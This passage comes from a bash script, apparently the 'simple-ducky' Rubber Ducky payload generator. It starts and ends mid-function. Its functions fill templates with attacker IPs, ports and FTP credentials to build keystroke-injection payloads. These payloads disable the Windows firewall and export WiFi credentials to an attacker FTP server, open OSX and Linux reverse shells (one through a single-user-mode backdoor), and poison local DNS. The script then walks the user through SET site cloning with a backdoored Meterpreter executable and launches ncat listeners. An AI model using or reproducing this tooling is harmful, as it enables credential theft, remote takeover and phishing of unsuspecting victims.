| sed "/STRING/s/attackerusername/$attackerusername/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt | |
| sed "/STRING/s/attackerpassword/$attackerpassword/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt | |
| sed "/STRING/s/webserverip/$webserverip/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload_del4.txt | |
| sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payload_del4.txt > /usr/share/simple-ducky/payload_del5.txt | |
| sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payload_del5.txt > /usr/share/simple-ducky/payload_del6.txt | |
| sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payload_del6.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| rm /usr/share/simple-ducky/payload_del2.txt | |
| rm /usr/share/simple-ducky/payload_del3.txt | |
| rm /usr/share/simple-ducky/payload_del4.txt | |
| rm /usr/share/simple-ducky/payload_del5.txt | |
| rm /usr/share/simple-ducky/payload_del6.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| echo -e "\e[1;34mMoving files over to your web directory and starting your web and ftp servers.\e[0m" | |
| sleep 4 | |
| clear | |
| cp /usr/share/simple-ducky/misc/7za.exe /var/www/7za.exe | |
| clear | |
| service apache2 restart | |
| clear | |
| service pure-ftpd restart | |
| clear | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # WiFi Acess Point Crediential Harvester w/UAC (Win Vista/7) | |
| ################################################################################# | |
| f_wifunVIS7uac(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m This script will enter the command shell as an administrator, disable the firewall and export the wifi settings. The exported settings will be sent to an ftp server of your choice." | |
| echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 w/UAC Enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m Bucky67GTO" | |
| echo "" | |
| echo "" | |
| read -p "What is the IP/Domain of your ftp server? " attackerftp | |
| echo "" | |
| read -p "What is the username for your ftp server? " attackerusername | |
| echo "" | |
| read -p "What is the password for your ftp server? " attackerpassword | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| sed "/STRING/s/attackerftp/$attackerftp/g" /usr/share/simple-ducky/payloads/wifunVIS7uac.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerusername/$attackerusername/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt | |
| sed "/STRING/s/attackerpassword/$attackerpassword/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| rm /usr/share/simple-ducky/payload_del2.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| service pure-ftpd restart | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # WiFi Acess Point Crediential Harvester w/o UAC (Win Vista/7) | |
| ################################################################################# | |
| f_wifunVIS7nouac(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m This script will enter the command shell as an administrator, disable the firewall and export the wifi settings. The exported settings will be sent to an ftp server of your choice." | |
| echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 w/o UAC Enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m Bucky67GTO" | |
| echo "" | |
| echo "" | |
| read -p "What is the IP/Domain of your ftp server? " attackerftp | |
| echo "" | |
| read -p "What is the username for your ftp server? " attackerusername | |
| echo "" | |
| read -p "What is the password for your ftp server? " attackerpassword | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| sed "/STRING/s/attackerftp/$attackerftp/g" /usr/share/simple-ducky/payloads/wifunVIS7nouac.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerusername/$attackerusername/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt | |
| sed "/STRING/s/attackerpassword/$attackerpassword/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| rm /usr/share/simple-ducky/payload_del2.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| service pure-ftpd restart | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # WiFi Acess Point Crediential Harvester w/UAC (Win 8) | |
| ################################################################################# | |
| f_wifunWIN8uac(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m This script will enter the command shell as an administrator, disable the firewall and export the wifi settings. The exported settings will be sent to an ftp server of your choice." | |
| echo -e "\e[1;31mTarget:\e[0m Windows 8 w/UAC Enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m Bucky67GTO" | |
| echo "" | |
| echo "" | |
| read -p "What is the IP/Domain of your ftp server? " attackerftp | |
| echo "" | |
| read -p "What is the username for your ftp server? " attackerusername | |
| echo "" | |
| read -p "What is the password for your ftp server? " attackerpassword | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| sed "/STRING/s/attackerftp/$attackerftp/g" /usr/share/simple-ducky/payloads/wifunWIN8uac.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerusername/$attackerusername/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt | |
| sed "/STRING/s/attackerpassword/$attackerpassword/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| rm /usr/share/simple-ducky/payload_del2.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| service pure-ftpd restart | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # WiFi Acess Point Crediential Harvester w/o UAC (Win 8) | |
| ################################################################################# | |
| f_wifunWIN8nouac(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m This script will enter the command shell as an administrator, disable the firewall and export the wifi settings. The exported settings will be sent to an ftp server of your choice." | |
| echo -e "\e[1;31mTarget:\e[0m Windows 8 w/o UAC Enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m Bucky67GTO" | |
| echo "" | |
| echo "" | |
| read -p "What is the IP/Domain of your ftp server? " attackerftp | |
| echo "" | |
| read -p "What is the username for your ftp server? " attackerusername | |
| echo "" | |
| read -p "What is the password for your ftp server? " attackerpassword | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| sed "/STRING/s/attackerftp/$attackerftp/g" /usr/share/simple-ducky/payloads/wifunWIN8nouac.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerusername/$attackerusername/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt | |
| sed "/STRING/s/attackerpassword/$attackerpassword/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| rm /usr/share/simple-ducky/payload_del2.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| echo -e "\e[1;34mGenerating your payload\e[0m" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| echo -e "\e[1;34mGenerating your payload\e[0m" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| service pure-ftpd restart | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| ################################################################################# | |
| # | |
| # Linux and OSX Payloads | |
| # | |
| ################################################################################# | |
| ################################################################################# | |
| ################################################################################# | |
| # OSX Reverse Shell | |
| ################################################################################# | |
| f_osxrev(){ | |
| clear | |
| echo -e "\e[1;31mDiscription:\e[0m This payload is designed to provide a reverse shell." | |
| echo -e "\e[1;31mNote:\e[0m Python will need to be installed for this payload to work." | |
| echo -e "\e[1;31mTarget:\e[0m MAC OSX (Various)" | |
| echo -e "\e[1;31mAuthor:\e[0m Kidovate" | |
| echo "" | |
| read -p "Launchctl autostart label? " launchlabel | |
| echo "" | |
| read -p "Where shall I send your shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m" | |
| echo "" | |
| sed -e "s/attackerip/$attackerip/g" -e "s/attackerport/$attackerport/g" /usr/share/simple-ducky/payloads/osxrev.conf > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| sed -i "s/someName/$launchlabel/g" /usr/share/simple-ducky/payload.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| echo "To catch your shell, use: " | |
| echo " ncat -l $attackerport" | |
| read -p "Would you like me to setup a listener [y/n]? " listener | |
| clear | |
| if [ "$listener" == "n" ]; then | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| else | |
| x-terminal-emulator -e ncat -vl $attackerport & | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| fi | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # OSX Single User Mode Backdoor | |
| ################################################################################# | |
| f_osxsingleuserrev(){ | |
| clear | |
| echo -e "\e[1;31mDiscription:\e[0m This payload is designed to provide a reverse shell using OSX Single User Mode." | |
| echo -e "\e[1;31mUsage:\e[0m Boot into single user mode with (Command – S). At the command prompt, plug in the ducky. " | |
| echo -e "\e[1;31mNote:\e[0m Be sure to use duck_v2.1.hex or above (see ducky-decode link)." | |
| echo -e "\e[1;31mDucky-Decode Link:\e[0m https://code.google.com/p/ducky-decode/" | |
| echo -e "\e[1;31mPayload Support Page:\e[0m http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/" | |
| echo -e "\e[1;31mTarget:\e[0m MAC OSX" | |
| echo -e "\e[1;31mAuthor:\e[0m Patrick Mosca" | |
| echo "" | |
| echo "" | |
| read -p "Where shall I send your shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m" | |
| echo "" | |
| sed "/dev/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/osxsingleuserrev.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/dev/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm payload_del.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| read -p "Would you like me to setup a listener [y/n]? " listener | |
| clear | |
| if [ "$listener" == "n" ]; then | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| else | |
| x-terminal-emulator -e ncat -lvp $attackerport & | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| fi | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Linux Reverse Shell | |
| ################################################################################# | |
| f_linuxrev(){ | |
| clear | |
| echo -e "\e[1;31mDescription:\e[0m This payload is designed to prvide a reverse shell." | |
| echo -e "\e[1;31mNote:\e[0m It is assumed that the victim's distro has Ncat Installed" | |
| echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit)" | |
| echo "" | |
| echo "" | |
| read -p "Where shall I send your shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m" | |
| sleep 2 | |
| echo "" | |
| sed "/nc/s/ipport/$attackerip $attackerport/g" /usr/share/simple-ducky/payloads/linuxrev.conf > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| read -p "Would you like me to setup a listener [y/n]? " listener | |
| clear | |
| if [ "$listener" == "n" ]; then | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| else | |
| x-terminal-emulator -e ncat -lvp $attackerport & | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| fi | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| ################################################################################# | |
| # | |
| # Forced Phishing | |
| # | |
| ################################################################################# | |
| ################################################################################# | |
| ################################################################################# | |
| # Local DNS Poisoning | SE-Toolkit w/UAC (Win Vista/7) | |
| ################################################################################# | |
| f_setlocaldnsVIS7uac(){ | |
| clear | |
| echo -e "\e[1;31mDiscription:\e[0m This payload is designed to setup local DNS poisioning on the victims machine. Couple this attack with the SE-Toolkit's website cloner and you will be unstoppable." | |
| echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 with UAC enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit) | props to ashbreeze96 and overwraith for the original concept" | |
| echo "" | |
| echo "" | |
| read -p "What is the IP address of your attacking webserver? " attackerip | |
| echo "" | |
| read -p "What website do you plan on spoofing (Don't use the FQDN)(example: example.com)? " attackerdomain | |
| echo -e "" | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| clear | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/setlocaldnsVIS7uac.conf > /usr/share/simple-ducky/payload_del1.txt | |
| sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del1.txt > /usr/share/simple-ducky/payload_del2.txt | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt | |
| sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| rm /usr/share/simple-ducky/payload_del2.txt | |
| rm /usr/share/simple-ducky/payload_del3.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| echo -e "\e[1;34mStopping your webserver...\e[0m" | |
| echo "" | |
| sleep 2 | |
| service apache2 stop | |
| clear | |
| echo "" | |
| echo -e "\e[1;34mDone!\e[0m" | |
| clear | |
| echo -e "\e[1;34mLaunching the Socail Engineering Toolkit (se-toolkit).\e[0m" | |
| echo "" | |
| sleep 2 | |
| x-terminal-emulator -e se-toolkit & | |
| clear | |
| echo -e "\e[1;34mHere are some recommended settings for the SE-Toolkit. Make changes as you see fit...\e[0m" | |
| echo "" | |
| sleep 2 | |
| echo "" | |
| echo "1) Social-Engineering Attacks" | |
| echo "" | |
| echo "2) Website Attack Vectors" | |
| echo "" | |
| echo "3) Java Applet Attack Method" | |
| echo "" | |
| echo "4) Site Cloner" | |
| echo "" | |
| echo "5) Are you using NAT/Port Forwarding [yes|no]: no" | |
| echo "" | |
| echo "6) IP address or hostname for the reverse connection: $attackerip" | |
| echo "" | |
| echo "7) Enter the url to clone: (Example: http://www.thisisafakesite.com)" | |
| echo "" | |
| echo "8) What payload do you want to generate: Windows Reverse_TCP Meterpreter" | |
| echo "" | |
| echo "9) Backdoored Executable (BEST)" | |
| echo "" | |
| echo "10) PORT of the listener [443]: $attackerport" | |
| echo "" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Local DNS Poisoning | SE-Toolkit w/o UAC (Win Vista/7) | |
| ################################################################################# | |
| f_setlocaldnsVIS7nouac(){ | |
| clear | |
| echo -e "\e[1;31mDiscription:\e[0m This payload is designed to setup local DNS poisioning on the victims machine. Couple this attack with the SE-Toolkit's website cloner and you will be unstoppable." | |
| echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 with UAC disabled" | |
| echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit) | props to ashbreeze96 and overwraith for the original concept" | |
| echo "" | |
| echo "" | |
| read -p "What is the IP address of your attacking webserver? " attackerip | |
| echo "" | |
| read -p "What website do you plan on spoofing (Don't use the FQDN)(example: example.com)? " attackerdomain | |
| echo -e "" | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| clear | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/setlocaldnsVIS7nouac.conf > /usr/share/simple-ducky/payload_del1.txt | |
| sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del1.txt > /usr/share/simple-ducky/payload_del2.txt | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt | |
| sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| rm /usr/share/simple-ducky/payload_del2.txt | |
| rm /usr/share/simple-ducky/payload_del3.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| echo -e "\e[1;34mStopping your webserver...\e[0m" | |
| echo "" | |
| sleep 2 | |
| service apache2 stop | |
| clear | |
| echo "" | |
| echo -e "\e[1;34mDone!\e[0m" | |
| clear | |
| echo -e "\e[1;34mLaunching the Socail Engineering Toolkit (se-toolkit).\e[0m" | |
| echo "" | |
| sleep 2 | |
| x-terminal-emulator -e se-toolkit & | |
| clear | |
| echo -e "\e[1;34mHere are some recommended settings for the SE-Toolkit. Make changes as you see fit...\e[0m" | |
| echo "" | |
| sleep 2 | |
| echo "" | |
| echo "1) Social-Engineering Attacks" | |
| echo "" | |
| echo "2) Website Attack Vectors" | |
| echo "" | |
| echo "3) Java Applet Attack Method" | |
| echo "" | |
| echo "4) Site Cloner" | |
| echo "" | |
| echo "5) Are you using NAT/Port Forwarding [yes|no]: no" | |
| echo "" | |
| echo "6) IP address or hostname for the reverse connection: $attackerip" | |
| echo "" | |
| echo "7) Enter the url to clone: (Example: http://www.thisisafakesite.com)" | |
| echo "" | |
| echo "8) What payload do you want to generate: Windows Reverse_TCP Meterpreter" | |
| echo "" | |
| echo "9) Backdoored Executable (BEST)" | |
| echo "" | |
| echo "10) PORT of the listener [443]: $attackerport" | |
| echo "" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Local DNS Poisoning | SE-Toolkit w/o UAC (WIndows 8) | |
| ################################################################################# | |
| f_setlocaldnsWIN8uac(){ | |
| clear | |
